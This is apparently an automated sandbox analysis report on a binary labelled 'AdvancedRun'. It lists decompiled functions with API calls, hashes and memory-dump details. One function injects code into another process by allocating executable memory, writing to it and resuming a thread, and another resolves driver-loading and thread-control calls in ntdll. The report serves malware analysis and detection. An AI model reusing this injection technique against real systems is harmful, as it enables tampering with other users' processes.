                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                        • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                        • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                        • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                        0x0040a474
                                                                                                        0x0040a47b
                                                                                                        0x0040a48a
                                                                                                        0x0040a48d
                                                                                                        0x0040a48f
                                                                                                        0x0040a497
                                                                                                        0x0040a49a
                                                                                                        0x0040a6f7
                                                                                                        0x0040a6f9
                                                                                                        0x0040a700
                                                                                                        0x0040a700
                                                                                                        0x0040a4ad
                                                                                                        0x0040a4b3
                                                                                                        0x0040a4b8
                                                                                                        0x0040a4c6
                                                                                                        0x0040a4cc
                                                                                                        0x0040a4cf
                                                                                                        0x0040a4dd
                                                                                                        0x0040a4e2
                                                                                                        0x0040a4e3
                                                                                                        0x0040a4ea
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4ec
                                                                                                        0x0040a4f6
                                                                                                        0x0040a4fe
                                                                                                        0x0040a503
                                                                                                        0x0040a504
                                                                                                        0x0040a50b
                                                                                                        0x0040a506
                                                                                                        0x0040a506
                                                                                                        0x0040a506
                                                                                                        0x0040a50d
                                                                                                        0x0040a512
                                                                                                        0x0040a518
                                                                                                        0x0040a51c
                                                                                                        0x0040a523
                                                                                                        0x0040a523
                                                                                                        0x0040a523
                                                                                                        0x0040a528
                                                                                                        0x0040a537
                                                                                                        0x0040a54c
                                                                                                        0x0040a539
                                                                                                        0x0040a544
                                                                                                        0x0040a549
                                                                                                        0x0040a558
                                                                                                        0x0040a56d
                                                                                                        0x0040a55a
                                                                                                        0x0040a565
                                                                                                        0x0040a56a
                                                                                                        0x0040a579
                                                                                                        0x0040a591
                                                                                                        0x0040a57b
                                                                                                        0x0040a589
                                                                                                        0x0040a58e
                                                                                                        0x0040a5b4
                                                                                                        0x0040a5b7
                                                                                                        0x0040a5cc
                                                                                                        0x0040a5cf
                                                                                                        0x0040a5d4
                                                                                                        0x0040a5d7
                                                                                                        0x0040a6ed
                                                                                                        0x0040a5e5
                                                                                                        0x0040a5fa
                                                                                                        0x0040a60b
                                                                                                        0x0040a61a
                                                                                                        0x0040a620
                                                                                                        0x0040a623
                                                                                                        0x0040a62b
                                                                                                        0x0040a62f
                                                                                                        0x0040a632
                                                                                                        0x0040a659
                                                                                                        0x0040a634
                                                                                                        0x0040a635
                                                                                                        0x0040a641
                                                                                                        0x0040a648
                                                                                                        0x0040a648
                                                                                                        0x0040a668
                                                                                                        0x0040a66e
                                                                                                        0x0040a685
                                                                                                        0x0040a69e
                                                                                                        0x0040a6a8
                                                                                                        0x0040a6ad
                                                                                                        0x0040a6bd
                                                                                                        0x0040a6c5
                                                                                                        0x0040a6c8
                                                                                                        0x0040a6d0
                                                                                                        0x0040a6d1
                                                                                                        0x0040a6d2
                                                                                                        0x0040a6d3
                                                                                                        0x0040a6d3
                                                                                                        0x0040a6c8
                                                                                                        0x0040a6d7
                                                                                                        0x0040a6dc
                                                                                                        0x0040a6dc
                                                                                                        0x0040a6d7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                        • memset.MSVCRT ref: 0040A4B3
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                          • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                          • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                          • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                          • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                          • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                          • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                        • memset.MSVCRT ref: 0040A66E
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                        • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                        • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                        • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                        • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                        • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                        • API String ID: 1572607441-20550370
                                                                                                        • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                        • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                        • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                        • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                        0x00401093
                                                                                                        0x00401096
                                                                                                        0x00401097
                                                                                                        0x0040109b
                                                                                                        0x004010a3
                                                                                                        0x004010a5
                                                                                                        0x00401270
                                                                                                        0x00401278
                                                                                                        0x004012b3
                                                                                                        0x0040127a
                                                                                                        0x00401293
                                                                                                        0x004012a2
                                                                                                        0x004012a2
                                                                                                        0x004012c1
                                                                                                        0x004012d9
                                                                                                        0x004012ea
                                                                                                        0x004012ec
                                                                                                        0x004012f6
                                                                                                        0x00000000
                                                                                                        0x004010ab
                                                                                                        0x004010ab
                                                                                                        0x004010ac
                                                                                                        0x00401231
                                                                                                        0x00401236
                                                                                                        0x00401239
                                                                                                        0x0040123d
                                                                                                        0x00401249
                                                                                                        0x00401249
                                                                                                        0x0040124c
                                                                                                        0x00000000
                                                                                                        0x00401252
                                                                                                        0x00401259
                                                                                                        0x00401265
                                                                                                        0x00000000
                                                                                                        0x00401265
                                                                                                        0x0040123f
                                                                                                        0x0040123f
                                                                                                        0x00401243
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00401243
                                                                                                        0x004010b2
                                                                                                        0x004010b2
                                                                                                        0x004010b5
                                                                                                        0x004011e1
                                                                                                        0x004011e3
                                                                                                        0x004011e6
                                                                                                        0x0040120e
                                                                                                        0x00401216
                                                                                                        0x00000000
                                                                                                        0x0040121c
                                                                                                        0x00401224
                                                                                                        0x00401226
                                                                                                        0x00401229
                                                                                                        0x00000000
                                                                                                        0x0040122f
                                                                                                        0x00000000
                                                                                                        0x0040122f
                                                                                                        0x00401229
                                                                                                        0x004011e8
                                                                                                        0x004011e8
                                                                                                        0x004011ed
                                                                                                        0x004011fb
                                                                                                        0x00401203
                                                                                                        0x00401203
                                                                                                        0x004010bb
                                                                                                        0x004010bb
                                                                                                        0x004010c0
                                                                                                        0x00401151
                                                                                                        0x0040115a
                                                                                                        0x00401168
                                                                                                        0x0040116b
                                                                                                        0x0040116e
                                                                                                        0x00401170
                                                                                                        0x00401173
                                                                                                        0x00401180
                                                                                                        0x00401182
                                                                                                        0x00401185
                                                                                                        0x004011a4
                                                                                                        0x004011ac
                                                                                                        0x00000000
                                                                                                        0x004011b2
                                                                                                        0x004011ba
                                                                                                        0x004011bc
                                                                                                        0x004011c7
                                                                                                        0x004011c9
                                                                                                        0x004011cb
                                                                                                        0x00000000
                                                                                                        0x004011d1
                                                                                                        0x00000000
                                                                                                        0x004011d1
                                                                                                        0x004011cb
                                                                                                        0x00401187
                                                                                                        0x00401187
                                                                                                        0x00401199
                                                                                                        0x00000000
                                                                                                        0x00401199
                                                                                                        0x004010c6
                                                                                                        0x004010c8
                                                                                                        0x004012fd
                                                                                                        0x004012fd
                                                                                                        0x004012fd
                                                                                                        0x004010ce
                                                                                                        0x004010ce
                                                                                                        0x004010d7
                                                                                                        0x004010e5
                                                                                                        0x004010e8
                                                                                                        0x004010eb
                                                                                                        0x004010ed
                                                                                                        0x004010f0
                                                                                                        0x00401102
                                                                                                        0x0040111d
                                                                                                        0x00401125
                                                                                                        0x00000000
                                                                                                        0x0040112b
                                                                                                        0x00401133
                                                                                                        0x00401135
                                                                                                        0x00401140
                                                                                                        0x00401142
                                                                                                        0x00401144
                                                                                                        0x00000000
                                                                                                        0x0040114a
                                                                                                        0x0040114a
                                                                                                        0x00000000
                                                                                                        0x0040114a
                                                                                                        0x00401144
                                                                                                        0x00401104
                                                                                                        0x0040110a
                                                                                                        0x0040110b
                                                                                                        0x0040110b
                                                                                                        0x0040110e
                                                                                                        0x00401115
                                                                                                        0x00401117
                                                                                                        0x00401117
                                                                                                        0x00401102
                                                                                                        0x004010c8
                                                                                                        0x004010c0
                                                                                                        0x004010b5
                                                                                                        0x004010ac
                                                                                                        0x00401303

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                        • String ID: AdvancedRun
                                                                                                        • API String ID: 829165378-481304740
                                                                                                        • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                        • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                        • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                        • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                        0x00408e38
                                                                                                        0x00408e44
                                                                                                        0x00408e56
                                                                                                        0x00408e68
                                                                                                        0x00408e7a
                                                                                                        0x00408e8c
                                                                                                        0x00408e9e
                                                                                                        0x00408eb0
                                                                                                        0x00408ec2
                                                                                                        0x00408ed4
                                                                                                        0x00408ee6
                                                                                                        0x00408ef8
                                                                                                        0x00408f0a
                                                                                                        0x00408f1c
                                                                                                        0x00408f21
                                                                                                        0x00408f23
                                                                                                        0x00000000
                                                                                                        0x00408f28
                                                                                                        0x00408f29

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                        • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                        • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                        • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                        • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                        • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                        • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                        • API String ID: 667068680-4280973841
                                                                                                        • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                        • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                        • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                        • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
